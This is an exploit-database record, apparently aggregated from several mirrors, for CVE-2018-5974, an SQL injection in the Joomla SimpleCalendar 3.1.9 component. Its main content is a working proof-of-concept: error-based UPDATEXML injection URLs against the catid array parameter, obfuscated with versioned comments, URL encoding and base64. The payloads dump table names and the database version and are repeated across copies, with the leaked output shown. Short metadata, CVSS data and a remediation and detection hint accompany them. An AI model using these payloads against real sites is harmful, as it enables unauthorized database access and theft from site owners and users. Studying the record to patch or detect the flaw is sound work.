ID 1337DAY-ID-29834
Type zdt
Reporter Ihsan Sencan
Modified 2018-02-17T00:00:00
Description
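Exploit for the PHP platform, in the web applications category: SQL injection in the SimpleCalendar 3.1.9 component for Joomla! via the catid array parameter (CVE-2018-5974, CWE-89). The sample response shown after the requests is a database error message that carries the server version and schema name, which indicates that the catid value reaches the SQL statement without being cast or escaped. The Joomla VEL entry in the record below lists versions 3.1.9 and previous as affected; no fixed version is named on this page. The usual remedy for this class of flaw is to cast every catid element to an integer (or bind it as a query parameter) before the query is built. For detection, web logs can be searched for requests to option=com_simplecalendar whose catid[...] value is not purely numeric.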
# # # #
# Exploit Title: Joomla! Component SimpleCalendar 3.1.9 - SQL Injection
# Vendor Homepage: http://albonico.ch/
# Software Link: http://software.albonico.ch/downloads/file/3-simplecalendar-3-1-9.html
# Version: 3.1.9
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5974
# # # #
# Exploit Author: Ihsan Sencan
# # # #
#
# POC:
#
# 1)
# http://localhost/[PATH]/index.php?option=com_simplecalendar&view=events&catid[0]=[SQL]
#
# JTI4JTU1JTUwJTQ0JTQxJTU0JTQ1JTU4JTRkJTRjJTI4JTMwJTJjJTJmJTJhJTIxJTMwJTMxJTMxJTMxJTMxJTQzJTRmJTRlJTQzJTQxJTU0JTJhJTJmJTI4MHgyZSUyYyU3NiU2NSU3MiU3MyU2OSU2ZiU2ZSUyOCUyOSUyYzB4N2U3ZTdlN2UlMmMlMjglNTMlNDUlNGMlNDUlNDMlNTQlMjAlMjglNDUlNGMlNTQlMjglMzYlMzYlM2QlMzYlMzYlMmMlMzElMjklMjklMjklMmMlNjQlNjElNzQlNjElNjIlNjElNzMlNjUlMjglMjklMjklMmMyOTI1JTI5JTI5
#
# http://localhost/[PATH]/index.php?option=com_simplecalendar&view=events&catid[VerAyari]=[SQL]
#
# KC8qITAyMjI1VVBEQVRFWE1MKi8oNjYsQ09OQ0FUKDB4M2EsKC8qITAyMjI1U0VMRUNUKi8rR1JPVVBfQ09OQ0FUKHRhYmxlX25hbWUrU0VQQVJBVE9SKzB4M2EpK0ZST00rSU5GT1JNQVRJT05fU0NIRU1BLlRBQkxFUysvKiEwMjIyNVdIRVJFKi8rVEFCTEVfU0NIRU1BPURBVEFCQVNFKCkpLChFTFQoMT0xLDEpKSksMSkp
#
# # # #
http://localhost/Joomla375/index.php?option=com_simplecalendar&view=events&catid[VerAyari]=(/*!02225UPDATEXML*/(66,CONCAT(0x3a,(/*!02225SELECT*/+GROUP_CONCAT(table_name+SEPARATOR+0x3a)+FROM+INFORMATION_SCHEMA.TABLES+/*!02225WHERE*/+TABLE_SCHEMA=DATABASE()),(ELT(1=1,1))),1))
http://localhost/Joomla375/index.php?option=com_simplecalendar&view=events&catid[0]=%28%55%50%44%41%54%45%58%4d%4c%28%30%2c%2f%2a%21%30%31%31%31%31%43%4f%4e%43%41%54%2a%2f%280x2e%2c%76%65%72%73%69%6f%6e%28%29%2c0x7e7e7e7e%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%2c2925%29%29
XPATH syntax error: '10.1.21-MariaDB~~~~1joomla375' XPATH syntax error: '10.1.21-MariaDB~~~~1joomla375'
# 0day.today [2018-04-08] #
{"href": "https://0day.today/exploit/description/29834", "sourceData": "# # # #\r\n# Exploit Title: Joomla! Component SimpleCalendar 3.1.9 - SQL Injection\r\n# Vendor Homepage: http://albonico.ch/\r\n# Software Link: http://software.albonico.ch/downloads/file/3-simplecalendar-3-1-9.html\r\n# Version: 3.1.9\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: CVE-2018-5974\r\n# # # #\r\n# Exploit Author: Ihsan Sencan \r\n# # # # \r\n# \r\n# POC:\r\n# \r\n# 1)\r\n# http://localhost/[PATH]/index.php?option=com_simplecalendar&view=events&catid[0]=[SQL]\r\n# \r\n# JTI4JTU1JTUwJTQ0JTQxJTU0JTQ1JTU4JTRkJTRjJTI4JTMwJTJjJTJmJTJhJTIxJTMwJTMxJTMxJTMxJTMxJTQzJTRmJTRlJTQzJTQxJTU0JTJhJTJmJTI4MHgyZSUyYyU3NiU2NSU3MiU3MyU2OSU2ZiU2ZSUyOCUyOSUyYzB4N2U3ZTdlN2UlMmMlMjglNTMlNDUlNGMlNDUlNDMlNTQlMjAlMjglNDUlNGMlNTQlMjglMzYlMzYlM2QlMzYlMzYlMmMlMzElMjklMjklMjklMmMlNjQlNjElNzQlNjElNjIlNjElNzMlNjUlMjglMjklMjklMmMyOTI1JTI5JTI5\r\n# \r\n# http://localhost/[PATH]/index.php?option=com_simplecalendar&view=events&catid[VerAyari]=[SQL]\r\n# \r\n# KC8qITAyMjI1VVBEQVRFWE1MKi8oNjYsQ09OQ0FUKDB4M2EsKC8qITAyMjI1U0VMRUNUKi8rR1JPVVBfQ09OQ0FUKHRhYmxlX25hbWUrU0VQQVJBVE9SKzB4M2EpK0ZST00rSU5GT1JNQVRJT05fU0NIRU1BLlRBQkxFUysvKiEwMjIyNVdIRVJFKi8rVEFCTEVfU0NIRU1BPURBVEFCQVNFKCkpLChFTFQoMT0xLDEpKSksMSkp\r\n# \r\n# # # #\r\n \r\nhttp://localhost/Joomla375/index.php?option=com_simplecalendar&view=events&catid[VerAyari]=(/*!02225UPDATEXML*/(66,CONCAT(0x3a,(/*!02225SELECT*/+GROUP_CONCAT(table_name+SEPARATOR+0x3a)+FROM+INFORMATION_SCHEMA.TABLES+/*!02225WHERE*/+TABLE_SCHEMA=DATABASE()),(ELT(1=1,1))),1))\r\n \r\nhttp://localhost/Joomla375/index.php?option=com_simplecalendar&view=events&catid[0]=%28%55%50%44%41%54%45%58%4d%4c%28%30%2c%2f%2a%21%30%31%31%31%31%43%4f%4e%43%41%54%2a%2f%280x2e%2c%76%65%72%73%69%6f%6e%28%29%2c0x7e7e7e7e%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%2c2925%29%29\r\n XPATH syntax error: '10.1.21-MariaDB~~~~1joomla375' 
XPATH syntax error: '10.1.21-MariaDB~~~~1joomla375'\n\n# 0day.today [2018-04-08] #", "bulletinFamily": "exploit", "modified": "2018-02-17T00:00:00", "title": "Joomla SimpleCalendar 3.1.9 Component - SQL Injection Vulnerability", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 7.5}, "sourceHref": "https://0day.today/exploit/29834", "cvelist": ["CVE-2018-5974"], "description": "Exploit for php platform in category web applications", "viewCount": 9, "published": "2018-02-17T00:00:00", "edition": 1, "id": "1337DAY-ID-29834", "type": "zdt", "lastseen": "2018-04-08T07:42:58", "reporter": "Ihsan Sencan", "enchantments": {"score": {"value": 6.5, "vector": "NONE", "modified": "2018-04-08T07:42:58", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-5974"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:C2C11B3F6A010145A4DF75B80E802E75"]}, {"type": "joomla", "idList": ["JVEL:594"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146456"]}, {"type": "exploitdb", "idList": ["EDB-ID:44126"]}], "modified": "2018-04-08T07:42:58", "rev": 2}, "vulnersScore": 6.5}, "references": []}
{"cve": [{"lastseen": "2021-02-02T06:52:40", "description": "SQL Injection exists in the SimpleCalendar 3.1.9 component for Joomla! via the catid array parameter.", "edition": 4, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-02-17T07:29:00", "title": "CVE-2018-5974", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-5974"], "modified": "2018-03-02T15:52:00", "cpe": ["cpe:/a:albonico:simplecalendar:3.1.9"], "id": "CVE-2018-5974", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-5974", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:albonico:simplecalendar:3.1.9:*:*:*:*:joomla\\!:*:*"]}], "packetstorm": [{"lastseen": "2018-02-17T17:02:52", "description": "", "published": "2018-02-17T00:00:00", "type": "packetstorm", "title": "Joomla! 
SimpleCalendar 3.1.9 SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-5974"], "modified": "2018-02-17T00:00:00", "id": "PACKETSTORM:146456", "href": "https://packetstormsecurity.com/files/146456/Joomla-SimpleCalendar-3.1.9-SQL-Injection.html", "sourceData": "`# # # # \n# Exploit Title: Joomla! Component SimpleCalendar 3.1.9 - SQL Injection \n# Dork: N/A \n# Date: 16.02.2018 \n# Vendor Homepage: http://albonico.ch/ \n# Software Link: http://software.albonico.ch/downloads/file/3-simplecalendar-3-1-9.html \n# Version: 3.1.9 \n# Category: Webapps \n# Tested on: WiN7_x64/KaLiLinuX_x64 \n# CVE: CVE-2018-5974 \n# # # # \n# Exploit Author: Ihsan Sencan \n# # # # \n# \n# POC: \n# \n# 1) \n# http://localhost/[PATH]/index.php?option=com_simplecalendar&view=events&catid[0]=[SQL] \n# \n# \n# http://localhost/[PATH]/index.php?option=com_simplecalendar&view=events&catid[VerAyari]=[SQL] \n# \n# \n# # # # \n \nhttp://localhost/Joomla375/index.php?option=com_simplecalendar&view=events&catid[VerAyari]=(/*!02225UPDATEXML*/(66,CONCAT(0x3a,(/*!02225SELECT*/+GROUP_CONCAT(table_name+SEPARATOR+0x3a)+FROM+INFORMATION_SCHEMA.TABLES+/*!02225WHERE*/+TABLE_SCHEMA=DATABASE()),(ELT(1=1,1))),1)) \n \nhttp://localhost/Joomla375/index.php?option=com_simplecalendar&view=events&catid[0]=%28%55%50%44%41%54%45%58%4d%4c%28%30%2c%2f%2a%21%30%31%31%31%31%43%4f%4e%43%41%54%2a%2f%280x2e%2c%76%65%72%73%69%6f%6e%28%29%2c0x7e7e7e7e%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%2c2925%29%29 \nXPATH syntax error: '10.1.21-MariaDB~~~~1joomla375' XPATH syntax error: '10.1.21-MariaDB~~~~1joomla375' \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/146456/joomlasimplecalendar319-sql.txt"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:23", "description": "\nJoomla! 
Component SimpleCalendar 3.1.9 - SQL Injection", "edition": 1, "published": "2018-02-16T00:00:00", "title": "Joomla! Component SimpleCalendar 3.1.9 - SQL Injection", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-5974"], "modified": "2018-02-16T00:00:00", "id": "EXPLOITPACK:C2C11B3F6A010145A4DF75B80E802E75", "href": "", "sourceData": "# # # #\n# Exploit Title: Joomla! Component SimpleCalendar 3.1.9 - SQL Injection\n# Dork: N/A\n# Date: 16.02.2018\n# Vendor Homepage: http://albonico.ch/\n# Software Link: http://software.albonico.ch/downloads/file/3-simplecalendar-3-1-9.html\n# Version: 3.1.9\n# Category: Webapps\n# Tested on: WiN7_x64/KaLiLinuX_x64\n# CVE: CVE-2018-5974\n# # # #\n# Exploit Author: Ihsan Sencan \n# # # # \n# \n# POC:\n# \n# 1)\n# http://localhost/[PATH]/index.php?option=com_simplecalendar&view=events&catid[0]=[SQL]\n# \n# JTI4JTU1JTUwJTQ0JTQxJTU0JTQ1JTU4JTRkJTRjJTI4JTMwJTJjJTJmJTJhJTIxJTMwJTMxJTMxJTMxJTMxJTQzJTRmJTRlJTQzJTQxJTU0JTJhJTJmJTI4MHgyZSUyYyU3NiU2NSU3MiU3MyU2OSU2ZiU2ZSUyOCUyOSUyYzB4N2U3ZTdlN2UlMmMlMjglNTMlNDUlNGMlNDUlNDMlNTQlMjAlMjglNDUlNGMlNTQlMjglMzYlMzYlM2QlMzYlMzYlMmMlMzElMjklMjklMjklMmMlNjQlNjElNzQlNjElNjIlNjElNzMlNjUlMjglMjklMjklMmMyOTI1JTI5JTI5\n# \n# http://localhost/[PATH]/index.php?option=com_simplecalendar&view=events&catid[VerAyari]=[SQL]\n# \n# KC8qITAyMjI1VVBEQVRFWE1MKi8oNjYsQ09OQ0FUKDB4M2EsKC8qITAyMjI1U0VMRUNUKi8rR1JPVVBfQ09OQ0FUKHRhYmxlX25hbWUrU0VQQVJBVE9SKzB4M2EpK0ZST00rSU5GT1JNQVRJT05fU0NIRU1BLlRBQkxFUysvKiEwMjIyNVdIRVJFKi8rVEFCTEVfU0NIRU1BPURBVEFCQVNFKCkpLChFTFQoMT0xLDEpKSksMSkp\n# \n# # # 
#\n\nhttp://localhost/Joomla375/index.php?option=com_simplecalendar&view=events&catid[VerAyari]=(/*!02225UPDATEXML*/(66,CONCAT(0x3a,(/*!02225SELECT*/+GROUP_CONCAT(table_name+SEPARATOR+0x3a)+FROM+INFORMATION_SCHEMA.TABLES+/*!02225WHERE*/+TABLE_SCHEMA=DATABASE()),(ELT(1=1,1))),1))\n\nhttp://localhost/Joomla375/index.php?option=com_simplecalendar&view=events&catid[0]=%28%55%50%44%41%54%45%58%4d%4c%28%30%2c%2f%2a%21%30%31%31%31%31%43%4f%4e%43%41%54%2a%2f%280x2e%2c%76%65%72%73%69%6f%6e%28%29%2c0x7e7e7e7e%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%2c2925%29%29\n XPATH syntax error: '10.1.21-MariaDB~~~~1joomla375' XPATH syntax error: '10.1.21-MariaDB~~~~1joomla375'", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2018-02-16T23:02:44", "description": "Joomla! Component SimpleCalendar 3.1.9 - SQL Injection. CVE-2018-5974. Webapps exploit for PHP platform. Tags: SQL Injection (SQLi)", "published": "2018-02-16T00:00:00", "type": "exploitdb", "title": "Joomla! Component SimpleCalendar 3.1.9 - SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-5974"], "modified": "2018-02-16T00:00:00", "id": "EDB-ID:44126", "href": "https://www.exploit-db.com/exploits/44126/", "sourceData": "# # # #\r\n# Exploit Title: Joomla! 
Component SimpleCalendar 3.1.9 - SQL Injection\r\n# Dork: N/A\r\n# Date: 16.02.2018\r\n# Vendor Homepage: http://albonico.ch/\r\n# Software Link: http://software.albonico.ch/downloads/file/3-simplecalendar-3-1-9.html\r\n# Version: 3.1.9\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: CVE-2018-5974\r\n# # # #\r\n# Exploit Author: Ihsan Sencan \r\n# # # # \r\n# \r\n# POC:\r\n# \r\n# 1)\r\n# http://localhost/[PATH]/index.php?option=com_simplecalendar&view=events&catid[0]=[SQL]\r\n# \r\n# JTI4JTU1JTUwJTQ0JTQxJTU0JTQ1JTU4JTRkJTRjJTI4JTMwJTJjJTJmJTJhJTIxJTMwJTMxJTMxJTMxJTMxJTQzJTRmJTRlJTQzJTQxJTU0JTJhJTJmJTI4MHgyZSUyYyU3NiU2NSU3MiU3MyU2OSU2ZiU2ZSUyOCUyOSUyYzB4N2U3ZTdlN2UlMmMlMjglNTMlNDUlNGMlNDUlNDMlNTQlMjAlMjglNDUlNGMlNTQlMjglMzYlMzYlM2QlMzYlMzYlMmMlMzElMjklMjklMjklMmMlNjQlNjElNzQlNjElNjIlNjElNzMlNjUlMjglMjklMjklMmMyOTI1JTI5JTI5\r\n# \r\n# http://localhost/[PATH]/index.php?option=com_simplecalendar&view=events&catid[VerAyari]=[SQL]\r\n# \r\n# KC8qITAyMjI1VVBEQVRFWE1MKi8oNjYsQ09OQ0FUKDB4M2EsKC8qITAyMjI1U0VMRUNUKi8rR1JPVVBfQ09OQ0FUKHRhYmxlX25hbWUrU0VQQVJBVE9SKzB4M2EpK0ZST00rSU5GT1JNQVRJT05fU0NIRU1BLlRBQkxFUysvKiEwMjIyNVdIRVJFKi8rVEFCTEVfU0NIRU1BPURBVEFCQVNFKCkpLChFTFQoMT0xLDEpKSksMSkp\r\n# \r\n# # # #\r\n\r\nhttp://localhost/Joomla375/index.php?option=com_simplecalendar&view=events&catid[VerAyari]=(/*!02225UPDATEXML*/(66,CONCAT(0x3a,(/*!02225SELECT*/+GROUP_CONCAT(table_name+SEPARATOR+0x3a)+FROM+INFORMATION_SCHEMA.TABLES+/*!02225WHERE*/+TABLE_SCHEMA=DATABASE()),(ELT(1=1,1))),1))\r\n\r\nhttp://localhost/Joomla375/index.php?option=com_simplecalendar&view=events&catid[0]=%28%55%50%44%41%54%45%58%4d%4c%28%30%2c%2f%2a%21%30%31%31%31%31%43%4f%4e%43%41%54%2a%2f%280x2e%2c%76%65%72%73%69%6f%6e%28%29%2c0x7e7e7e7e%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%2c2925%29%29\r\n XPATH syntax error: '10.1.21-MariaDB~~~~1joomla375' XPATH syntax error: '10.1.21-MariaDB~~~~1joomla375'", "cvss": {"score": 
0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/44126/"}], "joomla": [{"lastseen": "2020-11-13T19:49:16", "bulletinFamily": "software", "cvelist": ["CVE-2018-5974"], "description": "Simple Calendar by Fabrizio Albonico, versions 3.1.9 and previous, SQL Injection\n", "modified": "2020-03-20T19:51:03", "published": "2018-03-07T00:00:00", "id": "JVEL:594", "href": "https://vel.joomla.org", "type": "joomla", "title": "Simple Calendar,3.1.9,SQL Injection", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}